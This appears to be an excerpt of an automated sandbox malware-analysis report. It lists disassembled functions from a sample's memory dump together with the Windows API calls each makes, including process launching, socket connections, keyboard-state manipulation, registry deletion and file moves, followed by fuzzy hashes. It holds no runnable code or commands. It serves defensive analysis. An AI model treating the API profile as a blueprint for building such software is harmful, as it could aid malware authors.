                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: e7b549f9c0838ff618d0e1ecd2aa4a96a0a357ecfa0288ed97141785147003c0
                                          • Instruction ID: e064befbdbd05ba2bd3487b9a8b30d8309ca76744b5de5ea0708e7c8520e0983
                                          • Opcode Fuzzy Hash: e7b549f9c0838ff618d0e1ecd2aa4a96a0a357ecfa0288ed97141785147003c0
                                          • Instruction Fuzzy Hash: 2171DD34600204AFDB249F65C894FBABBB9FF89346F14196AFD45B73A1C771A848CB50
                                          Function 00E4F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E4F75C
                                          • _memset.LIBCMT ref: 00E4F825
                                          • ShellExecuteExW.SHELL32(?), ref: 00E4F86A
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • GetProcessId.KERNEL32(00000000), ref: 00E4F8E1
                                          • CloseHandle.KERNEL32(00000000), ref: 00E4F910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 1bce9057a634ff37cb62700927aa41f194181c40beb0e967e9c27e66b261b4b5
                                          • Instruction ID: f1d60daf1e80c78e1bf47baad226973e3ebf12f3563da00a208798d524601360
                                          • Opcode Fuzzy Hash: 1bce9057a634ff37cb62700927aa41f194181c40beb0e967e9c27e66b261b4b5
                                          • Instruction Fuzzy Hash: E161BB75A00619DFCB14EF64D590AAEFBF1FF48710B14946AE84ABB351CB31AD40CBA0
                                          Function 00E3145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00E3149C
                                          • GetKeyboardState.USER32(?), ref: 00E314B1
                                          • SetKeyboardState.USER32(?), ref: 00E31512
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E31540
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E3155F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E315A5
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E315C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 6f1212c28e270d650ebff932e253918c707f2deea706c1f544fcef2e399757f5
                                          • Instruction ID: d7d0be5d2bd65f4cde5463175377aeaee83f3cf076256aee40e08eef3910e03d
                                          • Opcode Fuzzy Hash: 6f1212c28e270d650ebff932e253918c707f2deea706c1f544fcef2e399757f5
                                          • Instruction Fuzzy Hash: F751F1A0A047D53EFB3643648C09BBA7EE95B46308F0C94CDE1D6668C2C2D8AC94D751
                                          Function 00E31276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00E312B5
                                          • GetKeyboardState.USER32(?), ref: 00E312CA
                                          • SetKeyboardState.USER32(?), ref: 00E3132B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E31357
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E31374
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E313B8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E313D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: ce45a85505d744fa15ed63f0bfb89540e63c242ca9fee1de4580641213964894
                                          • Instruction ID: 1f69cf1a0e9b05bf341c1c82e693e1cf7b87a591042cd0d39d069d996ca2ae8c
                                          • Opcode Fuzzy Hash: ce45a85505d744fa15ed63f0bfb89540e63c242ca9fee1de4580641213964894
                                          • Instruction Fuzzy Hash: 915104A05047D53DFB3683248C49BBABFE95F06308F0895CDE1D4668C2D795EC98E761
                                          Function 00E3589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: d5d163d07a1498ab23f8c492b92325774591c2db27016b51f7e49cd30bb51108
                                          • Instruction ID: 070e898d9331e6b3c0d63f36ed496109c590b9524fadd846057354a745b94e6f
                                          • Opcode Fuzzy Hash: d5d163d07a1498ab23f8c492b92325774591c2db27016b51f7e49cd30bb51108
                                          • Instruction Fuzzy Hash: 0241A366C2161876CB10FBB4888A9EFB7A8DF04310F51D966F618F3221E634E754C7B9
                                          Function 00E338AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E338D3,?), ref: 00E348C7
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E338D3,?), ref: 00E348E0
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E338F3
                                          • _wcscmp.LIBCMT ref: 00E3390F
                                          • MoveFileW.KERNEL32(?,?), ref: 00E33927
                                          • _wcscat.LIBCMT ref: 00E3396F
                                          • SHFileOperationW.SHELL32(?), ref: 00E339DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 040e189d32ec0174bc5fa93ce715be9a1c5ee29019b69694ab9291d42b6751bc
                                          • Instruction ID: 7113220504e38cc03cd184552bba4beccb2e569062ef8d71eac9775ee9cbe0d8
                                          • Opcode Fuzzy Hash: 040e189d32ec0174bc5fa93ce715be9a1c5ee29019b69694ab9291d42b6751bc
                                          • Instruction Fuzzy Hash: C64191B15083449EC751EF64C445AEFBBE8EF88340F10282EF489E3191EA74D688C762
                                          Function 00E57500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E57519
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E575C0
                                          • IsMenu.USER32(?), ref: 00E575D8
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E57620
                                          • DrawMenuBar.USER32 ref: 00E57633
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: c46aff4eb06efbd74b4fd98719581473d5f089a58516bbf90355300b91007e07
                                          • Instruction ID: f2ece7ff0d21f79cd560d6b54ff40a3a8a9e4a4d943d9fc76c74d24151d39d8c
                                          • Opcode Fuzzy Hash: c46aff4eb06efbd74b4fd98719581473d5f089a58516bbf90355300b91007e07
                                          • Instruction Fuzzy Hash: 80416A74A04608EFDB20DF55E884E9ABBF8FB04355F04842AED55A7250D770AD68CFA0
                                          Function 00E5122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E5125C
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E51286
                                          • FreeLibrary.KERNEL32(00000000), ref: 00E5133D
                                            • Part of subcall function 00E5122D: RegCloseKey.ADVAPI32(?), ref: 00E512A3
                                            • Part of subcall function 00E5122D: FreeLibrary.KERNEL32(?), ref: 00E512F5
                                            • Part of subcall function 00E5122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E51318
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E512E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: a9807d7cb980724b2de73daf80bb78ac1aa87cdb46efb222a413b3f1094dfaa5
                                          • Instruction ID: 19e61795b49266db996e484f366cfd7e67e9b217c4cc626aab7e32639c676b61
                                          • Opcode Fuzzy Hash: a9807d7cb980724b2de73daf80bb78ac1aa87cdb46efb222a413b3f1094dfaa5
                                          • Instruction Fuzzy Hash: E0315E75901209BFDB14DB90DC89EFFB7BCEF08305F0009A9E911F2151DB749E499AA0
                                          Function 00E5653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E5655B
                                          • GetWindowLongW.USER32(00F72230,000000F0), ref: 00E5658E
                                          • GetWindowLongW.USER32(00F72230,000000F0), ref: 00E565C3
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E565F5
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E5661F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E56630
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E5664A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: a936e2ebd998aef4841f27c8704cbd64298d4412fe95e678f8a8db71c7ab8d2b
                                          • Instruction ID: 49392e20d6db07b53b9e37a7809f8b5b20b394318177de4a20f5e4f479e37b6d
                                          • Opcode Fuzzy Hash: a936e2ebd998aef4841f27c8704cbd64298d4412fe95e678f8a8db71c7ab8d2b
                                          • Instruction Fuzzy Hash: 4B313730644210AFDB24CF19DC84F5537E1FB4A35AF9819AAF901AB2B5DB71EC48DB81
                                          Function 00E46486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E480A0: inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00E464D9
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E464E8
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00E46521
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00E4652A
                                          • WSAGetLastError.WS2_32 ref: 00E46534
                                          • closesocket.WS2_32(00000000), ref: 00E4655D
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00E46576
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 8e9a67d48300b333237b01d70c7eb0fd6c841543d9ba4850bb4466ddf47c3a4d
                                          • Instruction ID: bdbbf5499811302e12b26b5d09079313d61d7763243c16efacde08d238ead282
                                          • Opcode Fuzzy Hash: 8e9a67d48300b333237b01d70c7eb0fd6c841543d9ba4850bb4466ddf47c3a4d
                                          • Instruction Fuzzy Hash: F731B371600218AFDF14AF24EC85BBE7BACEB45715F00542AF909B7291DB74AD08CB62
                                          Function 00E2E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E2E0FA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E2E120
                                          • SysAllocString.OLEAUT32(00000000), ref: 00E2E123
                                          • SysAllocString.OLEAUT32 ref: 00E2E144
                                          • SysFreeString.OLEAUT32 ref: 00E2E14D
                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00E2E167
                                          • SysAllocString.OLEAUT32(?), ref: 00E2E175
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 77f28f5b3ba0462c5f08ecc0c10b4a880ce23ae4038b6ba99c1ec7a50ec2e778
                                          • Instruction ID: fa5a0870972050672ce4736f78c247aaaac6c46c16b5ac6b1244909ebacddbb2
                                          • Opcode Fuzzy Hash: 77f28f5b3ba0462c5f08ecc0c10b4a880ce23ae4038b6ba99c1ec7a50ec2e778
                                          • Instruction Fuzzy Hash: 6F217435605228AFDB149FA9DC88CAB77ECEB09760B108135F915DB2A1DB70DC458B64
                                          Function 00E5783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E578A1
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E578AE
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E578B9
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E578C8
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E578D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 2ad58253b13f65b7f3b4e916611634c0e783091d47db5945540b9077eaabaa76
                                          • Instruction ID: b618bf19f5f78370d19cd2ae298f788a7e558e43a76a0234d236e17f54db5ff4
                                          • Opcode Fuzzy Hash: 2ad58253b13f65b7f3b4e916611634c0e783091d47db5945540b9077eaabaa76
                                          • Instruction Fuzzy Hash: DC11B2B2110229BFEF159F60CC85EE77F6DEF087A8F015115FA48A2090C772AC25DBA0
                                          Function 00DF41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00DF41E3
                                          • GetProcAddress.KERNEL32(00000000), ref: 00DF41EA
                                          • RtlEncodePointer.NTDLL(00000000), ref: 00DF41F6
                                          • RtlDecodePointer.NTDLL(00000001), ref: 00DF4213
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 3489934621-340411864
                                          • Opcode ID: beb5c13b5d0cfd261ade817d403815241d9ef79209f0841c6716f9150918d482
                                          • Instruction ID: 8f3a31bae0d95fecec5bb63b8f3f27e6cc440a17118c95d25e4de81d62699c61
                                          • Opcode Fuzzy Hash: beb5c13b5d0cfd261ade817d403815241d9ef79209f0841c6716f9150918d482
                                          • Instruction Fuzzy Hash: 1FE0EDF45917009EEB106B73EC09F153694AB10743F108826F551F50E0DBB5409A8B10
                                          Function 00DF429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DF41B8), ref: 00DF42B8
                                          • GetProcAddress.KERNEL32(00000000), ref: 00DF42BF
                                          • RtlEncodePointer.NTDLL(00000000), ref: 00DF42CA
                                          • RtlDecodePointer.NTDLL(00DF41B8), ref: 00DF42E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
